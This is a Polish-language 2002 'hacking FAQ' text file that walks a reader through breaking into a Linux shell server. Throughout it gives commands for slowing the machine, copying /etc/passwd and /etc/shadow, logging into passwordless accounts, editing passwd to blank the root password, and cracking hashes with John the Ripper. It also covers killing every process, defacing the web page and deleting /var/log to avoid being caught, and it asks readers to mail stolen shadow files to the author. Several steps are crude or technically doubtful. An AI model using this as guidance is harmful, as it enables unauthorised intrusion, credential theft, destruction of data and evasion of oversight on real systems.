******************************************************************************
* *
* Frequently Asked Questions Linux Hacked by F3roobot - v.2.0 [PL] 2002 *
* f3roobot@free.net.pl *
* http://www.ahg.prv.pl *
* *
* Nie ponosze zadnej odpowiedzialnosci za jakiekolwiek niezgodne z prawem *
* wykorzystanie zawartych Tu informacji. *
* *
******************************************************************************
* *
* To co powinno być Tu - czyli na wstępie jest na zakonczeniu :P *
* Wlam na Serwer przez Shella... *
* *
* Jestes READY? Nooo to zaczynamy: *
* *
* GoTo na Serwer :P telnet 1konto-shell.pl *
* telnet 2konto-shell.de *
* telnet 3konto-shell.uk *
* telnet 4konto-shell.de *
* telnet konto-serwera-do-rozwalenia.pl *
* *
******************************************************************************
* *
* Na poczatek troche spowolnimy transfer... *
* screen wget http://www.microsoft.com/win98.rar :P [CTRL + A + D] *
* screen wget http://www.microsoft.com/win98.rar :P [CTRL + A + D] *
* *
******************************************************************************
* *
* screen ping localhost *
* screen ping localhost *
* *
******************************************************************************
* *
* screen echo /*/*/*/*/*/*/*/ [ Tym wiecej tym lepiej ] [CTRL + A + D ] *
* spowolni to maszynke, mozliwe ze bedzie poczebny reboot :>> *
* *
******************************************************************************
* *
* Musisz byc anonimowy, dyskretny, i ... *
* Musisz wiedziec jak najwiecej o systemie na serw. *
* Sprawdz logi, sprobuj skopiowac nizej wymienione do swojego *
* katalogu, a pozniej przez FTp`ka na HDd... Z konta oczywiscie *
* wszystko delete`nij zyby sie admin niezczail... *
* Po akcji zamien logi z serv. na swoje puste... albo z txt. *
* HACKED :] Ehhhh Root to Shit :] *
* *
* /var/log *
* *
* auth.log - logi userów *
* spooler -logi o dodanych grupach, userach *
* boot.log - uruchomiane procesy *
* dmesg.log - sprzęt, CPU itp. *
* messages - aktywność systemu *
* syslog - główny log aktywności całego systemu *
* ksyms - sprzęt, inicjalizacja... *
* *
* /etc/group - looknij na to, skopiuj jak idzie i szperaj :) *
* *
* cd /boot *
* cp config /home/twój-ident *
* cp config-2.4....mdk /home/twój-ident *
* cp /etc/ftpusers /home/twój-ident *
* cp /proc/version /home/twój-ident *
* *
* Sprawdz jeszcze czy przypadkiem nie idzie robic burdelu *
* w /var/log w /var/log/tmp w /var/tmp lub /tmp - *
* spobuj stworzyc np. katalog, jak idzie to wiesz co masz robic dalej :) *
* : screen wget http;//www.mic.../win2000.rar /var/log/tmp :) [ctrl +a +d ] *
* Kopiuj @ll z sieci co sie da, kiedys Im Miejsca na Hadeku braknie :) *
* Warto tez wiedziec jak sprawdzic ilosc wolnego miejsca na dysk(u/ach). *
* Piszemy 'df' (ang. disk free) *
* *
******************************************************************************
* *
* Polecenia ktore moga Ci sie przydac: ( heh ) *
* *
* last *
* lastlog *
* lastuser user *
* last user *
* lastlog user *
* lastcomm user *
* *
******************************************************************************
* *
* Warto tez wklepac: *
* *
* [johny@shell.com]~$ finger root >> plik1.txt *
* [johny@shell.com]~$ host -l -v -t localhost >> plik2.txt *
* [johny@shell.com]~$ echo -e "\n\n" >> plik3.txt *
* [johny@shell.com]~$ whois localhost >> plik4.txt *
* [johny@shell.com]~$ echo -e "\n\n" >> plik5.txt *
* [johny@shell.com]~$ finger @localhost >> plik6.txt *
* *
* Wszystko zapisze Ci sie do: plik1.txt , plik2,txt itd. *
* Przegraj to sobie na HDd i szperaj :) *
* *
* Sprawdz jaki na serv. jest SendMail: *
* [johny@shell.com]~$ telnet localhost 25 *
* -spisz sobie ver. pozniej @ll zalatwisz splolitem :] *
* *
* Sprawdz jaka jeste ver. SSH, jezeli jest: telnet localhost 22 *
* -to samo co wyzej, spisojesz i pozniej @ll zalatwisz splolitem :)) *
* *
******************************************************************************
* *
* Wejdz do: /etc/ i: cp passwd /home/Twoj-Ident *
* i przegraj na swoj Hdd i juz masz spis @ll userow na serw. *
* Jezeli zobaczysz ze przy ktoryms jest cos takiego: *
* user::0:0::: to znaczy ze lamer nie ma hasla, czyli: *
* telnet localhost *
* login: user *
* passwd: [enter] i teraz: *
* *
* [johny@shell.com]~$ passwd *
* i zmieniasz sobie haselko i masz nowe konto :] *
* *
* Sproboj zamienic plik passwd [ etc/ ] na swoj... *
* zmien linijke z rootem na cos takiego: *
* *
* root::0:0::: - czyli to samo co wyzej z userem... *
* *
* i wystarczy teraz: *
* *
* login: root *
* Password: *
* *
* # passwd *
* Enter password: *
* New password: *
* Rep. password: *
* # *
* *
* I Szalejesz... A root sika w gacie... *
* *
******************************************************************************
* *
* Jak dekryptowac hasla unixa? : Plik :/etc/shadow *
* Pewnie juz zauwazyles ze plik: passwd to tylko spis userow... *
* najlepiej jak zdobedziesz plik: /etc/shadow - sa tam zakodowane *
* hasla wszystkich userow. Nie wiem jak go zdobedziesz... *
* Ale powiem ze jest 10000 sposobow :PPPP Jak juz go masz To najpierw *
* posylasz Mi go: k64@poczta.fm a pozniej mozesz sie bawic w rozkodowywanie: *
* Sluza do tego programy jak John the ripper, Cracker Jack, czy Killer Crack.*
* Ja uzywa, Johna 1.5 , ale wybor nalezy do Ciebie. Wszystkie te programy *
* dzialaja pod Dosem. Sa tez programy pod unixa np Crack5.0, ale go nie *
* testowalem. Opisze tu obsluge Johna. *
* Na poczatku potrzebny jest slownik, ktore mozna znalezc na wielu stronach. *
* Np. Ja mam slownik ktory zajmoje 400MB !!! @ll kabinacje wyrazow: *
* Od 2 znakow - 12 !!! cool nie? chcesz CD`eje? to daj znac :) *
* Pierwsza metoda dziala bez slownika, jest najprostsza. *
* C:\WINDOWS\Pulpit\JOHN.COM -single shadow *
* druga metoda dziala ze slownikiem: *
* C:\WINDOWS\Pulpit\JOHN.COM -rules shadow -wordfile:slownik.txt *
* *
******************************************************************************
* *
* Jak juz jestes rootem to wpisz: *
* *
* $ ps -aux *
* *
* USER PID %CPU %MEM SIZE RSS TTY STAT START TIME COMMAND *
* bin 95 0.0 0.6 896 44 ? S 20:32 0:00 (portmap) *
* news 296 0.0 7.9 1580 516 ? S 20:33 0:00 /sbin/innd -p5 -r *
* news 300 0.0 0.3 872 24 ? S 20:33 0:00 (overchan) *
* jasio 283 0.1 11.0 1012 716 2 S 20:33 0:01 /bin/login -jasio *
* jasio 344 0.1 10.1 1220 656 2 S 20:38 0:01 -bash *
* asia 358 0.2 10.7 1012 700 3 S 20:39 0:01 /bin/login -asia *
* asia 359 0.1 9.7 1216 632 3 S 20:39 0:00 -bash *
* root 1 0.3 1.6 880 104 ? S 20:30 0:04 init *
* [...] *
* root 465 0.0 6.2 928 404 1 R 20:53 0:00 ps -aux *
* $ *
* USER - uzytkownik procesu *
* PID - numer identyfikacyjny procesu *
* TTY - procesy zwiazane z naszym terminalem *
* STAT - status procesu *
* R - proces dzialajacy (ang. running) *
* T - proces zatrzymany (ang. stopped) *
* P - proces w stanie spoczynku (ang. page wait) *
* D - proces w stanie spoczynku (ang. disk wait) *
* S - proces w stanie spoczynku (ang. sleeping) *
* I - proces w stanie spoczynku (ang. idle) *
* Z - proces duch (ang. zombie), zakonczyl sie ale nie rozliczyl *
* sie jeszcze z procesami nadrzednymi! *
* TIME - jak dlugo dziala proces *
* COMMAND - nazwa programu, ktorej odpowiada proces *
* %CPU - ilosc zaangazowania procesora w procesie *
* %MEM - jaka czesc pamieci operacyjnej zajmuje proces *
* START - czas startu procesu *
* *
* Nooo... i teraz pora troche namieszac w systemie: *
* *
* $ kill -9 -1 [PID] - To samo robisz ze @ll userami na serw. *
* Pozniej wlazisz na konta userow i zmienisz hasla, heh i @ll delete... *
* Zmien index.html w /var/www na swoj :) Hacked by TwojNick. *
* I nie zapomnij o pozdrowieniach... *
* *
******************************************************************************
* *
* Pamietaj O jednym, wszystko co robisz na serw. jest odnotowane w logach... *
* Ale jezeli jestes rootem to: rm -r /var/log [ hehe ] *
* Kasoj @ll logi [ tzn. wyczysc zawartosc ], poprostu nie daj sie zlapac!!! *
* I Pamietaj jeszcze ze Hacking jest karalny i wszystko *
* robisz na wlasna odpowiedzialnosc. Nie odpowiadam za Ten Txt. :PPP *
* Gdy sie wlamiesz, to Ty jestes Winny!Eee kto powiedzial ze cie znajda? heh *
* Zapomnialem1: Hackooy w nocy kiedy admin spi :)) *
* Zapomnialem2: Nie Hacooy Lepszych po fachu bo trafisz do piachu :)) *
* *
******************************************************************************
* *
* THE END - Dobrego Hackoowania... F3roobot *
* Greathings dla: Davcia ( najaaa... ) Outlawa *
* Kostki, Tumblera, Dm-neuro i innych *
* *
******************************************************************************